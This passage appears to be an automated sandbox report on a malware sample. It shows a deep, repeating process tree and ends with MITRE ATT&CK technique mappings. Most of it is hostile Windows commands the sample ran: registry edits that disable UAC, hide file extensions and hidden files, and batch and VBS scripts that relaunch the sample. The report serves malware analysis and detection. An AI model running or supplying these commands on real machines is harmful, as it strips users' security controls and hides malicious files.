61⤵
PID:2960

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
58⤵
PID:5292

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
58⤵
PID:5548

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
58⤵
PID:1844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hgYscsIg.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
58⤵
PID:5208

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
59⤵
PID:5612

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
56⤵
PID:3872

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
56⤵
PID:4092

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
56⤵
- UAC bypass
PID:5200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FuAQkIQo.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
56⤵
PID:3104

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
57⤵
PID:4700

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
54⤵
PID:3452

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
54⤵
PID:5640

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
54⤵
- UAC bypass
PID:4680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZgQEoIIk.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
54⤵
PID:3908

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
55⤵
PID:5788

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
52⤵
PID:5664

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
52⤵
PID:4704

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
52⤵
PID:768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gagAIMYA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
52⤵
PID:5652

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
53⤵
PID:6096

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
50⤵
PID:4828

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
50⤵
- Modifies registry key
PID:2416

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
50⤵
- UAC bypass
PID:4060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AIUQkwMw.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
50⤵
PID:4484

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
51⤵
PID:5792

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
48⤵
PID:3248

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
48⤵
PID:3772

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
48⤵
PID:756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\caUYMcsM.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
48⤵
PID:2824

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
49⤵
PID:5268

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
46⤵
- Modifies visibility of file extensions in Explorer
PID:416

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
46⤵
PID:5856

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
46⤵
- UAC bypass
- Modifies registry key
PID:4340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmcIEAEg.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
46⤵
PID:5576

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
47⤵
PID:4876

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
44⤵
PID:3616

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
44⤵
PID:1196

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
44⤵
PID:2912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dswoUwcU.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
44⤵
PID:5776

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
45⤵
PID:3460

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
42⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:5476

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
42⤵
PID:5864

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
42⤵
- UAC bypass
PID:4136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bScAYsYA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
42⤵
PID:1800

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
43⤵
PID:2268

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
40⤵
- Modifies visibility of file extensions in Explorer
PID:1476

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
40⤵
PID:1868

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
40⤵
PID:4540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lOQAkgII.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
40⤵
PID:5676

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
41⤵
PID:1604

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
38⤵
PID:1004

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
38⤵
- Modifies registry key
PID:224

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
38⤵
- UAC bypass
PID:5740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nUIsAksA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
38⤵
PID:3984

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
39⤵
PID:1116

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
36⤵
PID:5688

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
36⤵
PID:4220

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
36⤵
- UAC bypass
PID:2028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CMUQMQcA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
36⤵
PID:6096

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
37⤵
PID:2204

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
34⤵
- Modifies visibility of file extensions in Explorer
PID:1316

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
34⤵
PID:1388

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
34⤵
PID:3284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YEYAgUEA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
34⤵
PID:2116

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
35⤵
PID:5508

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
32⤵
PID:3364

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
32⤵
PID:1124

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
32⤵
- UAC bypass
PID:2092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MeockgsY.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
32⤵
PID:3268

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
33⤵
PID:4932

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
30⤵
PID:4428

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
30⤵
- Modifies registry key
PID:4960

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
30⤵
- UAC bypass
PID:5940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JiwgEUMs.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
30⤵
PID:3348

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
31⤵
PID:1988

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
28⤵
PID:5132

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
28⤵
PID:3504

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
28⤵
- UAC bypass
PID:5848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Dgssgkco.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
28⤵
PID:5272

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
29⤵
PID:4776

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
26⤵
PID:3720

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
26⤵
PID:5564

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
26⤵
- UAC bypass
- Modifies registry key
PID:4992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XWsMcoIA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
26⤵
PID:5228

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
27⤵
PID:5628

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
24⤵
PID:3428

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
24⤵
- Modifies registry key
PID:3172

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
24⤵
- UAC bypass
PID:2684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pCEskEME.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
24⤵
PID:4224

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
25⤵
PID:2904

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
22⤵
- Modifies visibility of file extensions in Explorer
PID:3116

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
22⤵
PID:5652

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
22⤵
PID:5664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\weQUggAc.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
22⤵
PID:3844

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
23⤵
PID:3872

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
20⤵
PID:4912

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
20⤵
PID:1632

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
20⤵
PID:2416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uSwkogoI.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
20⤵
PID:1648

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
21⤵
PID:5640

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
18⤵
- Modifies visibility of file extensions in Explorer
PID:1164

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
18⤵
- Modifies registry key
PID:4712

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
18⤵
PID:4668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kygMkEYs.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
18⤵
PID:2692

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
19⤵
PID:5308

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
16⤵
- Modifies visibility of file extensions in Explorer
PID:5020

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
16⤵
PID:3932

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
16⤵
- UAC bypass
PID:2144

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UIAYMksU.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
16⤵
PID:1516

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
17⤵
PID:3256

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
14⤵
- Modifies visibility of file extensions in Explorer
PID:5612

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
14⤵
PID:5492

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
14⤵
PID:1556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZiEEgosQ.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
14⤵
PID:704

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
15⤵
PID:5812

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
12⤵
- Modifies visibility of file extensions in Explorer
PID:5844

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
12⤵
PID:5536

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
12⤵
PID:2096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TIMkMcII.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
12⤵
PID:708

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
13⤵
PID:5980

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
10⤵
PID:4100

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
10⤵
PID:1044

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
10⤵
- UAC bypass
PID:5292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fmkIUwwg.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
10⤵
PID:908

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
11⤵
PID:2440

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
8⤵
PID:3784

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
8⤵
- Modifies registry key
PID:4092

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
8⤵
- UAC bypass
PID:768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DwAAMkgs.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
8⤵
PID:4644

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
9⤵
PID:6028

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
6⤵
PID:3732

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
6⤵
PID:5508

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
6⤵
PID:2380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CWgEkQQw.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
6⤵
PID:5488

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
7⤵
PID:5792

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
4⤵
PID:428

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
4⤵
PID:3740

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
4⤵
- UAC bypass
PID:5520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IgIcsYkg.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
4⤵
- Suspicious use of WriteProcessMemory
PID:2348

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
5⤵
PID:6076

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
2⤵
PID:2344

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
2⤵
PID:1664

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
2⤵
- UAC bypass
- Modifies registry key
PID:1816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FgoYscQs.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:2324

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
3⤵
PID:2264

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

